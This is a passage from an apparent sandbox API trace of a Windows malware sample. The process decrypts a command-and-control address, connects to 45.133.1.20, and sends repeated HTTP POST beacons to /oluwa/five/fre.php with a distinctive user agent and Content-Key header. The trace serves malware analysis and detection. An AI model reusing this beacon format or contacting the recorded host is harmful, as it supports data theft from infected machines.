ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0239.819] GetProcessHeap () returned 0x6a0000 [0239.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0239.819] GetProcessHeap () returned 0x6a0000 [0239.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0239.820] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.820] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.821] GetProcessHeap () returned 0x6a0000 [0239.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dbd50 [0239.821] GetProcessHeap () returned 0x6a0000 [0239.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.821] GetProcessHeap () returned 0x6a0000 [0239.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0239.821] GetProcessHeap () returned 0x6a0000 [0239.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0239.822] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.823] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.823] GetProcessHeap () returned 0x6a0000 [0239.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0239.823] GetProcessHeap () returned 0x6a0000 [0239.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.823] send (s=0x79c, buf=0x6bd460*, len=242, flags=0) returned 242 [0239.824] send (s=0x79c, buf=0x6bb998*, len=159, flags=0) returned 159 [0239.824] GetProcessHeap () returned 0x6a0000 [0239.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0239.824] recv (in: s=0x79c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0239.903] GetProcessHeap () returned 0x6a0000 [0239.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0239.904] GetProcessHeap () returned 0x6a0000 [0239.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0239.904] GetProcessHeap () returned 0x6a0000 [0239.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbd50 | out: hHeap=0x6a0000) returned 1 [0239.906] GetProcessHeap () returned 0x6a0000 [0239.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0239.907] closesocket (s=0x79c) returned 0 [0239.907] GetProcessHeap () returned 0x6a0000 [0239.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0239.907] GetProcessHeap () returned 0x6a0000 [0239.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.908] GetProcessHeap () returned 0x6a0000 [0239.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0239.908] GetProcessHeap () returned 0x6a0000 [0239.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0239.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14d0) returned 0x79c [0239.910] Sleep (dwMilliseconds=0xea60) [0239.912] GetProcessHeap () returned 0x6a0000 [0239.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0239.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.913] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.920] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0239.929] GetProcessHeap () returned 0x6a0000 [0239.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9bd8 [0239.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.930] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b9bd8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.932] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.933] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.933] GetProcessHeap () returned 0x6a0000 [0239.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9bd8 | out: hHeap=0x6a0000) returned 1 [0239.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.937] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0239.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.938] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.939] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0239.939] GetProcessHeap () returned 0x6a0000 [0239.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.940] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.941] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.946] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.948] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.948] GetProcessHeap () returned 0x6a0000 [0239.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0239.948] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.948] GetProcessHeap () returned 0x6a0000 [0239.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0239.948] GetProcessHeap () returned 0x6a0000 [0239.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.949] GetProcessHeap () returned 0x6a0000 [0239.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0239.949] GetProcessHeap () returned 0x6a0000 [0239.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0239.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.950] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0239.967] GetProcessHeap () returned 0x6a0000 [0239.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0239.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.971] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.972] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.973] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.973] GetProcessHeap () returned 0x6a0000 [0239.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0239.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.977] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0239.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.982] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.983] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0239.983] GetProcessHeap () returned 0x6a0000 [0239.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.984] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0239.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.986] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0239.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.987] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0239.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.988] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0239.988] GetProcessHeap () returned 0x6a0000 [0239.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0239.989] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0239.989] GetProcessHeap () returned 0x6a0000 [0239.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0239.989] socket (af=2, type=1, protocol=6) returned 0x7a0 [0239.989] connect (s=0x7a0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0240.015] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0240.016] GetProcessHeap () returned 0x6a0000 [0240.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0240.016] GetProcessHeap () returned 0x6a0000 [0240.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0240.017] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0240.018] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0240.018] GetProcessHeap () returned 0x6a0000 [0240.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db990 [0240.018] GetProcessHeap () returned 0x6a0000 [0240.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0240.019] GetProcessHeap () returned 0x6a0000 [0240.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0240.019] GetProcessHeap () returned 0x6a0000 [0240.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0240.020] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0240.021] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0240.021] GetProcessHeap () returned 0x6a0000 [0240.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0240.021] GetProcessHeap () returned 0x6a0000 [0240.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0240.022] send (s=0x7a0, buf=0x6bd460*, len=242, flags=0) returned 242 [0240.025] send (s=0x7a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0240.025] GetProcessHeap () returned 0x6a0000 [0240.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0240.025] recv (in: s=0x7a0, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0240.491] GetProcessHeap () returned 0x6a0000 [0240.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0240.492] GetProcessHeap () returned 0x6a0000 [0240.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0240.492] GetProcessHeap () returned 0x6a0000 [0240.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db990 | out: hHeap=0x6a0000) returned 1 [0240.493] GetProcessHeap () returned 0x6a0000 [0240.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0240.493] closesocket (s=0x7a0) returned 0 [0240.494] GetProcessHeap () returned 0x6a0000 [0240.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0240.494] GetProcessHeap () returned 0x6a0000 [0240.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0240.494] GetProcessHeap () returned 0x6a0000 [0240.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0240.495] GetProcessHeap () returned 0x6a0000 [0240.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0240.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14d4) returned 0x7a0 [0240.497] Sleep (dwMilliseconds=0xea60) [0240.517] GetProcessHeap () returned 0x6a0000 [0240.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0240.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.519] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.529] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0240.541] GetProcessHeap () returned 0x6a0000 [0240.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0240.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.543] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0240.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.553] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.554] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.554] GetProcessHeap () returned 0x6a0000 [0240.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0240.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.556] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0240.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.557] CryptDestroyKey (hKey=0x6ad520) returned 1 [0240.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.559] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0240.559] GetProcessHeap () returned 0x6a0000 [0240.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0240.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.562] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0240.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.563] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0240.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.564] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0240.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.565] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0240.566] GetProcessHeap () returned 0x6a0000 [0240.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0240.566] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0240.566] GetProcessHeap () returned 0x6a0000 [0240.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0240.567] GetProcessHeap () returned 0x6a0000 [0240.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0240.567] GetProcessHeap () returned 0x6a0000 [0240.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0240.568] GetProcessHeap () returned 0x6a0000 [0240.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0240.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.569] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.576] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0240.584] GetProcessHeap () returned 0x6a0000 [0240.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0240.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.585] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0240.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.586] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.587] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.587] GetProcessHeap () returned 0x6a0000 [0240.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0240.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.588] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0240.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.589] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0240.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.590] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0240.590] GetProcessHeap () returned 0x6a0000 [0240.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0240.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.591] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0240.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.592] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0240.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.595] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0240.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.596] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0240.596] GetProcessHeap () returned 0x6a0000 [0240.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0240.596] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0240.596] GetProcessHeap () returned 0x6a0000 [0240.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0240.596] socket (af=2, type=1, protocol=6) returned 0x7a4 [0240.597] connect (s=0x7a4, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0240.628] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0240.628] GetProcessHeap () returned 0x6a0000 [0240.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0240.628] GetProcessHeap () returned 0x6a0000 [0240.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0240.629] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0240.630] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 